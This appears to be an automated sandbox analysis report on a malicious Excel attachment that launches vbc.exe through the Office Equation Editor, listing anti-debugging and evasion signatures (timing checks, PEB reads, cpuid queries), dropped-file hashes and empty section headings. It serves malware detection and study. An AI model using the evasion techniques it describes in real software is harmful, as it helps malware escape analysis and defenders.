Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F06D2	6_2_002F06D2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F4345	6_2_002F4345
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F8B51	6_2_002F8B51
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3FA8	6_2_002F3FA8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F37A5	6_2_002F37A5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3FE9	6_2_002F3FE9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3FC2	6_2_002F3FC2

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_002F2407 rdtsc

6_2_002F2407

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1952

Thread sleep time: -180000s >= -30000s

Jump to behavior

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_002F2407 rdtsc

6_2_002F2407

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F5022 mov eax, dword ptr fs:[00000030h]	6_2_002F5022
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F70BE mov eax, dword ptr fs:[00000030h]	6_2_002F70BE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F7CB7 mov eax, dword ptr fs:[00000030h]	6_2_002F7CB7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F293F mov eax, dword ptr fs:[00000030h]	6_2_002F293F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F3147 mov eax, dword ptr fs:[00000030h]	6_2_002F3147
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002F6B34 mov eax, dword ptr fs:[00000030h]	6_2_002F6B34

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000006.00000002.2351769276.0000000000860000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000006.00000002.2351769276.0000000000860000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.2351769276.0000000000860000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Users\Public\vbc.exe

Code function: 6_2_002F69D7 cpuid

6_2_002F69D7

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

ID:	451759
Product:	CloudBasic
Start time:	08:29:26
Start date:	21.07.2021
Sample:	new order requirment-21 July.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	25f7735ff71a70abf4bb508d2711f50b
SHA1:	7f40fff223019a3e399ca0ae0990afaf2695e93b
SHA256:	821f2880a8218afc0d30711b46f7d28e9adb2cd6c3db88b881de91090e72337f
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	19CAC1EE3A6E5E9F83054616F5D5CE6F	5B7F16098760F887B0BDC5FEE9223D022E0597FB	3709110CC04E0EAFFE10BEC5E8A5C82B858BEE4195975E7BCD30C50B246F56C3
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1932524.png	PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced	17EC925977BED2836071429D7B476809	7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C	83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\37B1DE58.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	43CF62101F3FFAF6D31E0D5F37C30007	03AC28698404188E7543EB03EB00689824BD2646	C21D151DCE306D1A3A1D0AC20EFB0C67D45084C6A8A937C35366559AF9A6BAA4
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\39F9BEF.png	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced	9513E5EF8DDC8B0D9C23C4DFD4AEECA2	E7FC283A9529AA61F612EC568F836295F943C8EC	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3BACCE26.jpeg	[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3	722C1BE1697CFCEAE7BDEFB463265578	7D300A2BAB951B475477FAA308E4160C67AD93A9	2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\437A52B0.png	PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced	17EC925977BED2836071429D7B476809	7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C	83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4775DAD2.jpeg	[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3	722C1BE1697CFCEAE7BDEFB463265578	7D300A2BAB951B475477FAA308E4160C67AD93A9	2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\55C93AD5.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3	738BDB90A9D8929A5FB2D06775F3336F	6A92C54218BFBEF83371E825D6B68D4F896C0DCE	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\69375A79.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3	738BDB90A9D8929A5FB2D06775F3336F	6A92C54218BFBEF83371E825D6B68D4F896C0DCE	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DE6E00F3.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	7EDE5CDF9E711B59F6F7574F11B44421	0822C61BC1738315D9292ADC21C2F83750E1EB7A	D82F09FCCFF29DC4EC8E49582BD3535E8BA8CB0E212033AF379C393987FB2430
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F4ADC8AB.png	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced	9513E5EF8DDC8B0D9C23C4DFD4AEECA2	E7FC283A9529AA61F612EC568F836295F943C8EC	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso3759.tmp	PC bitmap, Windows 3.x format, 20 x 20 x 24	A3C62E516777C15BF216F12143693C61	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso375A.tmp	PC bitmap, Windows 3.x format, 20 x 20 x 24	A3C62E516777C15BF216F12143693C61	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso375B.tmp	PC bitmap, Windows 3.x format, 20 x 20 x 24	A3C62E516777C15BF216F12143693C61	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoDFD4.tmp	PC bitmap, Windows 3.x format, 20 x 20 x 24	A3C62E516777C15BF216F12143693C61	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoE004.tmp	PC bitmap, Windows 3.x format, 20 x 20 x 24	A3C62E516777C15BF216F12143693C61	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoE005.tmp	PC bitmap, Windows 3.x format, 20 x 20 x 24	A3C62E516777C15BF216F12143693C61	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
C:\Users\user\Desktop\~$new order requirment-21 July.xlsx	data	96114D75E30EBD26B572C1FC83D1D02E	A44EEBDA5EB09862AC46346227F06F8CFAF19407	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386, for MS Windows	19CAC1EE3A6E5E9F83054616F5D5CE6F	5B7F16098760F887B0BDC5FEE9223D022E0597FB	3709110CC04E0EAFFE10BEC5E8A5C82B858BEE4195975E7BCD30C50B246F56C3

Windows Analysis Report new order requirment-21 July.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs